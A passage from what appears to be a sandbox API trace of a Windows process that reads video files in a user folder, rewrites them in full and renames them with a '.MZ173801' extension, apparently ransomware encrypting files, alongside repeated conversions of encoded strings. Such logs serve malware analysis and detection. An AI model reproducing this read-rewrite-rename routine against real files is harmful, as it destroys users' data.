DJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.827] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0120.828] GetCurrentThreadId () returned 0x1358 [0120.828] GetCurrentThreadId () returned 0x1358 [0120.828] GetCurrentThreadId () returned 0x1358 [0120.828] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.828] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0120.828] GetCurrentThreadId () returned 0x1358 [0120.829] GetCurrentThreadId () returned 0x1358 [0120.829] GetCurrentThreadId () returned 0x1358 [0120.829] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\7aB-vg.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\7ab-vg.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.829] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0120.829] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.829] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x11182 [0120.829] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.829] ReadFile (in: hFile=0x40c, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x11182, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f14c*=0x11182, lpOverlapped=0x0) returned 1 [0120.830] CloseHandle (hObject=0x40c) returned 1 [0120.831] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\7aB-vg.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\7ab-vg.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.833] WriteFile (in: hFile=0x40c, lpBuffer=0x23b67d0*, nNumberOfBytesToWrite=0x11182, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x23b67d0*, lpNumberOfBytesWritten=0x19f158*=0x11182, lpOverlapped=0x0) returned 1 [0120.834] CloseHandle (hObject=0x40c) returned 1 [0120.837] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\7aB-vg.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\7ab-vg.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\7aB-vg.swf.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\7ab-vg.swf.mz173801")) returned 1 [0120.837] GetCurrentThreadId () returned 0x1358 [0120.837] GetCurrentThreadId () returned 0x1358 [0120.837] GetCurrentThreadId () returned 0x1358 [0120.837] GetCurrentThreadId () returned 0x1358 [0120.837] GetCurrentThreadId () returned 0x1358 [0120.837] GetCurrentThreadId () returned 0x1358 [0120.837] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x408ee80, ftCreationTime.dwHighDateTime=0x1d5e8b0, ftLastAccessTime.dwLowDateTime=0x52a76ab0, ftLastAccessTime.dwHighDateTime=0x1d5e439, ftLastWriteTime.dwLowDateTime=0x52a76ab0, ftLastWriteTime.dwHighDateTime=0x1d5e439, nFileSizeHigh=0x0, nFileSizeLow=0xfe4f, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="i C0t9ivIXYO.flv", cAlternateFileName="IC0T9I~1.FLV")) returned 1 [0120.837] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.837] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.838] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\i C0t9ivIXYO.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\i c0t9ivixyo.flv"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x408ee80, ftCreationTime.dwHighDateTime=0x1d5e8b0, ftLastAccessTime.dwLowDateTime=0x52a76ab0, ftLastAccessTime.dwHighDateTime=0x1d5e439, ftLastWriteTime.dwLowDateTime=0x52a76ab0, ftLastWriteTime.dwHighDateTime=0x1d5e439, nFileSizeHigh=0x0, nFileSizeLow=0xfe4f)) returned 1 [0120.838] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.838] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0120.838] GetCurrentThreadId () returned 0x1358 [0120.838] GetCurrentThreadId () returned 0x1358 [0120.838] GetCurrentThreadId () returned 0x1358 [0120.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0120.839] GetCurrentThreadId () returned 0x1358 [0120.839] GetCurrentThreadId () returned 0x1358 [0120.839] GetCurrentThreadId () returned 0x1358 [0120.839] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\i C0t9ivIXYO.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\i c0t9ivixyo.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.839] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0120.839] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.839] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0xfe4f [0120.839] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.839] ReadFile (in: hFile=0x40c, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0xfe4f, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f14c*=0xfe4f, lpOverlapped=0x0) returned 1 [0120.841] CloseHandle (hObject=0x40c) returned 1 [0120.842] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\i C0t9ivIXYO.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\i c0t9ivixyo.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.922] WriteFile (in: hFile=0x40c, lpBuffer=0x23b47d0*, nNumberOfBytesToWrite=0xfe4f, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x23b47d0*, lpNumberOfBytesWritten=0x19f158*=0xfe4f, lpOverlapped=0x0) returned 1 [0120.924] CloseHandle (hObject=0x40c) returned 1 [0120.926] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\i C0t9ivIXYO.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\i c0t9ivixyo.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\VmAilK6Ug\\i C0t9ivIXYO.flv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\vmailk6ug\\i c0t9ivixyo.flv.mz173801")) returned 1 [0120.927] GetCurrentThreadId () returned 0x1358 [0120.927] 